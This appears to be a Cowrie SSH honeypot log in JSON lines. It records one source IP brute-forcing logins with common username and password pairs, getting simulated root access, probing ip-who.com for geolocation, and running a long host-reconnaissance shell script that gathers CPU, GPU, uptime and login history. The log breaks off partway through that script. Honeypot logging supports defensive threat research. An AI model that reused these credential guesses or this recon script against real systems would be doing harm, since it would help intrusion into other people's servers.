{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:22:41.378257Z","src_ip":"212.227.235.229","session":"2efc7ef1c496"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:22:43.933484Z","src_ip":"212.227.235.229","session":"9d879b7b959b"}
{"eventid":"cowrie.login.failed","username":"proftpd","password":"proftpd","message":"login attempt [proftpd/proftpd] failed","sensor":"my-vps","timestamp":"2025-08-26T21:22:45.903228Z","src_ip":"212.227.235.229","session":"2efc7ef1c496"}
{"eventid":"cowrie.session.closed","duration":"9.4","message":"Connection lost after 9.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:22:47.168592Z","src_ip":"212.227.235.229","session":"2efc7ef1c496"}
{"eventid":"cowrie.session.closed","duration":"17.1","message":"Connection lost after 17.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:22:52.379797Z","src_ip":"212.227.235.229","session":"aa0cd28c2ae1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35644,"dst_ip":"1.2.3.4","dst_port":22,"session":"f629cbade3c1","protocol":"ssh","message":"New connection: 212.227.235.229:35644 (1.2.3.4:22) [session: f629cbade3c1]","sensor":"my-vps","timestamp":"2025-08-26T21:22:57.582241Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:22:57.607899Z","src_ip":"212.227.235.229","session":"f629cbade3c1"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:22:57.857010Z","src_ip":"212.227.235.229","session":"f629cbade3c1"}
{"eventid":"cowrie.login.failed","username":"developer","password":"123456","message":"login attempt [developer/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T21:22:58.992460Z","src_ip":"212.227.235.229","session":"f629cbade3c1"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:23:00.256464Z","src_ip":"212.227.235.229","session":"f629cbade3c1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33780,"dst_ip":"1.2.3.4","dst_port":22,"session":"933ecfb6013c","protocol":"ssh","message":"New connection: 212.227.235.229:33780 (1.2.3.4:22) [session: 933ecfb6013c]","sensor":"my-vps","timestamp":"2025-08-26T21:23:02.297801Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:23:02.299424Z","src_ip":"212.227.235.229","session":"933ecfb6013c"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:23:02.544494Z","src_ip":"212.227.235.229","session":"933ecfb6013c"}
{"eventid":"cowrie.login.success","username":"root","password":"111111","message":"login attempt [root/111111] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:23:04.172385Z","src_ip":"212.227.235.229","session":"933ecfb6013c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-26T21:23:04.627014Z","session":"933ecfb6013c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T21:23:04.879820Z","src_ip":"212.227.235.229","session":"933ecfb6013c"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:23:05.178597Z","src_ip":"212.227.235.229","session":"933ecfb6013c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54368,"dst_ip":"1.2.3.4","dst_port":22,"session":"b337eafdad58","protocol":"ssh","message":"New connection: 212.227.235.229:54368 (1.2.3.4:22) [session: b337eafdad58]","sensor":"my-vps","timestamp":"2025-08-26T21:23:26.439696Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:23:26.778891Z","src_ip":"212.227.235.229","session":"b337eafdad58"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:23:26.941419Z","src_ip":"212.227.235.229","session":"b337eafdad58"}
{"eventid":"cowrie.login.failed","username":"pizza","password":"pizza","message":"login attempt [pizza/pizza] failed","sensor":"my-vps","timestamp":"2025-08-26T21:23:28.504420Z","src_ip":"212.227.235.229","session":"b337eafdad58"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52994,"dst_ip":"1.2.3.4","dst_port":22,"session":"54c38bc9089c","protocol":"ssh","message":"New connection: 212.227.235.229:52994 (1.2.3.4:22) [session: 54c38bc9089c]","sensor":"my-vps","timestamp":"2025-08-26T21:23:30.771882Z"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:23:31.487533Z","src_ip":"212.227.235.229","session":"b337eafdad58"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:23:32.028303Z","src_ip":"212.227.235.229","session":"54c38bc9089c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T21:23:32.029050Z","src_ip":"212.227.235.229","session":"54c38bc9089c"}
{"eventid":"cowrie.login.success","username":"root","password":"Passw0rd","message":"login attempt [root/Passw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:23:36.260608Z","src_ip":"212.227.235.229","session":"54c38bc9089c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42224,"dst_ip":"1.2.3.4","dst_port":22,"session":"f7a5b78138c0","protocol":"ssh","message":"New connection: 212.227.235.229:42224 (1.2.3.4:22) [session: f7a5b78138c0]","sensor":"my-vps","timestamp":"2025-08-26T21:23:36.746139Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:23:36.951846Z","src_ip":"212.227.235.229","session":"f7a5b78138c0"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:23:37.007917Z","src_ip":"212.227.235.229","session":"f7a5b78138c0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:23:38.002158Z","src_ip":"212.227.235.229","session":"54c38bc9089c"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && 